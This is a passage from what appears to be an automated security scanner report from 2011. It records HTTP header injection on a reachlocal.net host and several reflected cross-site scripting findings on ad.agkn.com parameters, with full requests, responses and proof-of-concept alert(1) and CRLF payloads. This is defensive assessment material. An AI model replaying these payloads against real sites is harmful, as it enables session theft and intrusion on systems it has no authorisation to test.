Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:01 GMT
Server: Apache
Location: http://utdi.com/36765
cd72234d30c
/productpic_avaya1.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/36765
cd72234d30c/productpic_a
...[SNIP]...

1.47. http://utdi.reachlocal.net/images/spacer.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/spacer.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d288a%0d%0a00c7c1b4fe2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d288a%0d%0a00c7c1b4fe2/spacer.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:49 GMT
Server: Apache
Location: http://utdi.com/d288a
00c7c1b4fe2
/spacer.gif
Vary: Accept-Encoding
Content-Length: 298
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d288a
00c7c1b4fe2/spacer.gif">
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 135 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.agkn.com/iframe!t=1129! [clk1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1329d"><script>alert(1)</script>68ab14b7166 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=3523644183486696711329d"><script>alert(1)</script>68ab14b7166&mt_id=126412&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:53 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKBAAAAAAkBArwBATUBC%2FABoAADAUIBBQABQwEFAAFBAQUAAQK8fhdn5xh1LAY%2FAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:53 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=3523644183486696711329d"><script>alert(1)</script>68ab14b7166&mt_id=126412&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=462918736?imid=1686570677704590911&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Cons
...[SNIP]...

2.2. http://ad.agkn.com/iframe!t=1129! [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The value of the mt_adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3783"><script>alert(1)</script>e292a848299 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060d3783"><script>alert(1)</script>e292a848299&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKCAAAAAA0BArwBATUBC%2FAB4AADAUIBBwABQwEHAAFBAQcAAQK8fhIojCjOb%2FrIAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060d3783"><script>alert(1)</script>e292a848299&redirect=http://ad.agkn.com/interaction!che=83841845?imid=1308449798641154760&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-
...[SNIP]...

2.3. http://ad.agkn.com/iframe!t=1129! [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The value of the mt_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4a4"><script>alert(1)</script>52debf145d7 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=1264127c4a4"><script>alert(1)</script>52debf145d7&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKCAAAAAAsBArwBATUBC%2FABwAADAUIBBgABQwEGAAFBAQYAAQK8fniLvnViAKPrAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=1264127c4a4"><script>alert(1)</script>52debf145d7&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=2040497228?imid=8686245717678793707&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/
...[SNIP]...

2.4. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b84a"><script>alert(1)</script>edb5176eb5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&9b84a"><script>alert(1)</script>edb5176eb5f=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:55 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKDAAAAABEBArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjH%2FMgJ0ufACAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:55 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&9b84a"><script>alert(1)</script>edb5176eb5f=1http://ad.agkn.com/interaction!che=1716110508?imid=3602653213049352194&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se
...[SNIP]...

2.5. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf115"%3balert(1)//760f2f14d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf115";alert(1)//760f2f14d5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&bf115"%3balert(1)//760f2f14d5b=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:55 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKDAAAAABMBArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8flg7HoVyhy11AAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:55 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&bf115";alert(1)//760f2f14d5b=1http://ad.agkn.com/interaction!che=1802253544?imid=6357708857464532341&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se
...[SNIP]...

2.6. http://ad.agkn.com/iframe!t=1129! [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5340"><script>alert(1)</script>140300babcc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=e5340"><script>alert(1)</script>140300babcc HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
